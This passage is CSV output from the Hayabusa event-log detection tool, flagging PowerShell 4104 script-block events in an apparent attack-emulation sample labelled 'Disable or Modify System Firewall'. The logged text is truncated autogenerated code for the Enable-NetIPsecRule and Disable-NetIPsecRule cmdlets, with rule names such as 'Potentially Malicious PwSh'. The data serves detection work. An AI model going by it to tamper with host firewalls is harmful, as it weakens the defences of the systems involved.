[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 